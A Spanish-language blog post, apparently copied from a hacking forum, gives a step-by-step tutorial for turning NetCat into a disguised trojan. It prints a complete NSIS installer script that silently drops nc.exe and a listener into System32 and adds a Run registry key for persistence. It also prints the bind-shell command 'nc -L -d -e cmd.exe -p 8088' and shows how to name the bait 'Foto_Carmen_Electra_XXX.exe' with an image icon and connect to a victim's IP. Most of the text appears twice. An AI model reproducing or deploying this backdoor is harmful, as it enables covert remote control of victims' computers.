Empaquetando NetCat
Manual:
Empaquetando NetCat
Bienvenidos a este tutorial, de cómo empaquetar el NetCat con un método bastante simple y fácil.
Las herramientas necesarias son las siguientes:
- NetCat (La navaja Suiza de los Hackers)
- NSIS (Actualmente existe la versión 2.9)
- ExeScript
- Y una imagen .ico
| Descargar Herramientas |
Como ya tenemos todo, ¡Sigamos!
Lo primero de todo, instalamos el NSIS y el ExeScript y luego creamos una carpeta en cualquier lado, por ejemplo en el Escritorio. Le damos un nombre cualquiera y creamos un archivo que contenga de extensión “.nsi”
Yo lo he llamado source.nsi =P
Una vez creado, lo abrimos con el Bloc de notas, o con cualquier otro editor de texto, en mi caso estoy usando el NotePad ++ (Recomendado). Y copiamos el siguiente CODE.
NOTA: Los “;” (punto y coma) que encontráis en el CODE expuesto, son comentarios, si queréis podéis borrarlo, si no, no pasa nada.
Una vez creado nuestro .nsi, ejecutamos el ExeScript, pero recordad que antes debemos de introducir el número de serie.
Vamos a Help > Register he introducimos el número de serial que tenemos.
Y le damos OK. Una vez introducido correctamente el serial, etc. Debemos de cerrar por completo el ExeScript y volver a ejecutarlo.
Ahora crearemos nuestro archivo exe que pondrá en la escucha al netcat mediante el puerto 8088, por ejemplo.
En ExeScript vamos a File > New > Batch File (bat) o (cmd), como queráis.
Entonces ahora nos saldrá como una hoja en blanco donde podremos introducir el código que queramos, y copiaremos lo siguiente:
nc -L -d -e cmd.exe -p 8088
Ahora configuraremos el ExeScript como está en la imagen siguiente:
Work directory = Other directory
Directory = %WINDIR%\System32 (Lo escribimos manualmente)
Silent mode = True
Command line = lo dejamos en blanco
Output file = Le indicamos en donde tenemos nuestro source.nsi para que una vez que compilemos nuestro script a .exe lo haga ahí mismo.
Una vez acabado todo esto, vamos a File > Sava As y lo guardamos en la misma carpeta en donde tenemos nuestro archivo con extensión .nsi (source.nsi), con el nombre listen.bat o listen.cmd.
Vamos de nuevo al ExeScript y vamos a > Project > Build > Aceptar.
Como veremos, en la carpeta donde habíamos guardado nuestro listen.bat o listen.cmd, se nos acaba de crear un nuevo archivo llamado listen, con extensión .exe y que tiene la misma función pero como hemos indicado más arriba, se ejecutará en modo silencioso, etc.
Bueno ahora, ha llegado la hora de la verdad…
¿Cómo lo compilamos?
Muy fácil, solo le damos clic derecho a nuestro archivo “nsi” (source.nsi), y le damos a Compile NSIS Script.
Una vez compilado nos saldrá algo parecido a esto al final.
Using lzma compression.
EXE header size: 168448 / 33792 bytes
Install code: 624 / 3385 bytes
Install data: 28154 / 61495 bytes
CRC (0xF745FD1D): 4 / 4 bytes
Total size: 197230 / 98676 bytes (199.8%)
Pues, eso quiere decir que todo ha salido bien
Ahora tendremos un archivo llamado “Foto_Carmen_Electra_XXX.exe”, en nuestra carpeta que es como lo hemos llamado en el archivo source.nsi, pero ustedes podéis ponerle el que queráis, esto solo ha sido un ejemplo bastante claro xD
Una vez compilado, si queremos hacer la prueba, lo podemos ejecutar en nuestro mismo equipo, aunque posiblemente el antivirus lo detecte.
Si todo ha salido bien, para poder conectarnos a nosotros mismo o a nuestra víctima, tendríamos que hacer lo siguiente.
Inicio > Ejecutar > cmd
Como veis nos saldrá una pantallita negra, a lo que se le llama Shell, MS-DOS (En Windows), Símbolo del Sistema, etc. que está esperando que le mandemos una orden. Entonces escribiremos el siguiente comando.
nc –vv 127.0.0.1 8088
Como veis nos hemos conectado satisfactoriamente a nosotros mismos, si queremos conectarnos a otra IP (víctima), tendríamos que cambiar el 127.0.0.1 por la IP que sea, a eso se le llama conexión directa y el puerto como veis es el 8088, que es el que seleccionamos en el archivo CMD para la escucha.
Fuente:
DarkSkull
Las herramientas necesarias son las siguientes:
- NetCat (La navaja Suiza de los Hackers)
- NSIS (Actualmente existe la versión 2.9)
- ExeScript
- Y una imagen .ico
| Descargar Herramientas |
Como ya tenemos todo, ¡Sigamos!
Antes de nada, recomiendo ver el siguiente tutorial:
http://foro.infiernohacker.com/index.php?topic=7825.0
http://foro.infiernohacker.com/index.php?topic=7825.0
Lo primero de todo, instalamos el NSIS y el ExeScript y luego creamos una carpeta en cualquier lado, por ejemplo en el Escritorio. Le damos un nombre cualquiera y creamos un archivo que contenga de extensión “.nsi”
Código:
;Empaquetando NetCat by DarkSkull
;SOURCE.NSI
Name "Empaquetando NetCat by DarkSkull"
OutFile "Foto_Carmen_Electra_XXX.exe"
Icon "jpeg.ico"
SilentInstall silent
Section "Copy Files"
SetOutPath $SYSDIR ; = System32
File "nc.exe"
File "listen.exe"
SectionEnd
Section "Registro"
ReadRegStr $R0 HKLM "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" "listen"
WriteRegStr HKLM "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" "listen" "$SYSDIR\listen.exe"
SetOutPath $SYSDIR
Exec "listen.exe"
SectionEnd
;FIN
Yo lo he llamado source.nsi =P
Una vez creado, lo abrimos con el Bloc de notas, o con cualquier otro editor de texto, en mi caso estoy usando el NotePad ++ (Recomendado). Y copiamos el siguiente CODE.
NOTA: Los “;” (punto y coma) que encontráis en el CODE expuesto, son comentarios, si queréis podéis borrarlo, si no, no pasa nada.
Una vez creado nuestro .nsi, ejecutamos el ExeScript, pero recordad que antes debemos de introducir el número de serie.
Vamos a Help > Register he introducimos el número de serial que tenemos.
Y le damos OK. Una vez introducido correctamente el serial, etc. Debemos de cerrar por completo el ExeScript y volver a ejecutarlo.
Ahora crearemos nuestro archivo exe que pondrá en la escucha al netcat mediante el puerto 8088, por ejemplo.
En ExeScript vamos a File > New > Batch File (bat) o (cmd), como queráis.
Entonces ahora nos saldrá como una hoja en blanco donde podremos introducir el código que queramos, y copiaremos lo siguiente:
nc -L -d -e cmd.exe -p 8088
Ahora configuraremos el ExeScript como está en la imagen siguiente:
Work directory = Other directory
Directory = %WINDIR%\System32 (Lo escribimos manualmente)
Silent mode = True
Command line = lo dejamos en blanco
Output file = Le indicamos en donde tenemos nuestro source.nsi para que una vez que compilemos nuestro script a .exe lo haga ahí mismo.
Una vez acabado todo esto, vamos a File > Sava As y lo guardamos en la misma carpeta en donde tenemos nuestro archivo con extensión .nsi (source.nsi), con el nombre listen.bat o listen.cmd.
Vamos de nuevo al ExeScript y vamos a > Project > Build > Aceptar.
Como veremos, en la carpeta donde habíamos guardado nuestro listen.bat o listen.cmd, se nos acaba de crear un nuevo archivo llamado listen, con extensión .exe y que tiene la misma función pero como hemos indicado más arriba, se ejecutará en modo silencioso, etc.
Bueno ahora, ha llegado la hora de la verdad…
¿Cómo lo compilamos?
Muy fácil, solo le damos clic derecho a nuestro archivo “nsi” (source.nsi), y le damos a Compile NSIS Script.
Una vez compilado nos saldrá algo parecido a esto al final.
Using lzma compression.
EXE header size: 168448 / 33792 bytes
Install code: 624 / 3385 bytes
Install data: 28154 / 61495 bytes
CRC (0xF745FD1D): 4 / 4 bytes
Total size: 197230 / 98676 bytes (199.8%)
Pues, eso quiere decir que todo ha salido bien
Ahora tendremos un archivo llamado “Foto_Carmen_Electra_XXX.exe”, en nuestra carpeta que es como lo hemos llamado en el archivo source.nsi, pero ustedes podéis ponerle el que queráis, esto solo ha sido un ejemplo bastante claro xD
Una vez compilado, si queremos hacer la prueba, lo podemos ejecutar en nuestro mismo equipo, aunque posiblemente el antivirus lo detecte.
Si todo ha salido bien, para poder conectarnos a nosotros mismo o a nuestra víctima, tendríamos que hacer lo siguiente.
Inicio > Ejecutar > cmd
Como veis nos saldrá una pantallita negra, a lo que se le llama Shell, MS-DOS (En Windows), Símbolo del Sistema, etc. que está esperando que le mandemos una orden. Entonces escribiremos el siguiente comando.
nc –vv 127.0.0.1 8088
Como veis nos hemos conectado satisfactoriamente a nosotros mismos, si queremos conectarnos a otra IP (víctima), tendríamos que cambiar el 127.0.0.1 por la IP que sea, a eso se le llama conexión directa y el puerto como veis es el 8088, que es el que seleccionamos en el archivo CMD para la escucha.
Fuente:
DarkSkull
Suscribirse a:
Enviar comentarios (Atom)
0 comentarios:
Publicar un comentario